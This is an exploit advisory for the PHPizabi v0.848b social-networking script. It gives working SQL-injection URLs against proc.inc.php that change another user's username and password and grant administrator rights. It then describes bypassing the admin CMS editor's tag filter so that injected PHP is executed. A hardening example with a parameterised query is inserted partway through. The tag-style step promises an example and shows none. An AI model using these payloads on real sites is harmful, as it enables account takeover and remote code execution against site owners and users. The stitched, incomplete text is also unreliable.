PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)

--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/ 
software site: http://www.phpizabi.net/ 
--------------------------------------------------------------------------------

vulnerability:
sql injection in /theme/default/proc.inc.php

..
	LoadThis($buffer);
	// HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
	if (isset($_GET["notepad_body"])) {
		myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
		me("flush");
	}
..

note urldecode(): PHP has already decoded $_GET, so this is a second decode. A double-encoded %2527 reaches the script as %27 and becomes a bare quote only here, after any magic_quotes_gpc escaping has been applied, which is why the injection does not depend on php.ini.
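As an added illustration (not PHPizabi's code), the notepad update above beside a hardened form, run against an in-memory SQLite table that stands in for [x]users; the table name users, the $userId argument and the sample request value are assumptions:

```php
<?php
// Added example, not PHPizabi's code. The `users` table stands in for the
// prefixed `[x]users` of the original, and $userId replaces me("id").

// Vulnerable shape of proc.inc.php: $_GET is already URL-decoded by PHP, so
// urldecode() is a second decode; %2527 -> %27 -> ' only appears after any
// magic_quotes escaping, and the quote is concatenated straight into SQL.
function updateNotepadVulnerable(PDO $db, array $get, string $userId): void {
    if (isset($get["notepad_body"])) {
        $db->exec("UPDATE `users` SET `notepad_body` = '" . urldecode($get["notepad_body"])
            . "' WHERE `id`='" . $userId . "'");
    }
}

// Hardened form: no second decode, and the body travels as a bound parameter,
// so quotes inside it are data and cannot change the statement's structure.
function updateNotepadSafe(PDO $db, array $get, int $userId): bool {
    if (!isset($get["notepad_body"]) || !is_string($get["notepad_body"])) {
        return false; // missing value, or an array smuggled in via notepad_body[]
    }
    $stmt = $db->prepare("UPDATE `users` SET `notepad_body` = :body WHERE `id` = :id");
    return $stmt->execute([':body' => $get["notepad_body"], ':id' => $userId]);
}

// Constructed fixture mimicking the columns the advisory's payload touches.
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, notepad_body TEXT, is_administrator INTEGER DEFAULT 0)");
$db->exec("INSERT INTO users (id, username) VALUES (1, 'bookoo'), (2, 'victim')");

// Constructed request value: what PHP hands the script after decoding a
// %2527-encoded query string once (the %27 is still encoded at this point).
$get = ["notepad_body" => "%27, is_administrator = 1 WHERE username = %27bookoo%27/*"];

updateNotepadSafe($db, $get, 1);
$row = $db->query("SELECT notepad_body, is_administrator FROM users WHERE id = 1")
          ->fetch(PDO::FETCH_ASSOC);
var_dump($row);
```

With the safe function the row keeps is_administrator = 0 and stores the request value verbatim; the vulnerable function, fed the same value, executes the advisory's rewritten UPDATE instead.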

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index 

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file} 

use this opening and closing tag style, example:

(it is always available, see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of this preg_replace() in /modules/admin/cms/edit.php:

..
	if (isset($_POST["Submit"])) {
		if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
			// only the <? ... ?> / <?php / <% ... %> tag forms are stripped before the
			// user-supplied body is written into a .php file that is later loaded
			$body = "\n"
				.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
				."\n";
			fwrite($handle, $body);
			fclose($handle);
..

which is bypassed: the pattern only removes the <? / <?php / ?> and <% / %> tag forms, so any other tag form PHP accepts is written unchanged into modules/cms/{id}.php and executed when that file is loaded.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_ 

to see the output...

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs 

..
--------------------------------------------------------------------------------

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html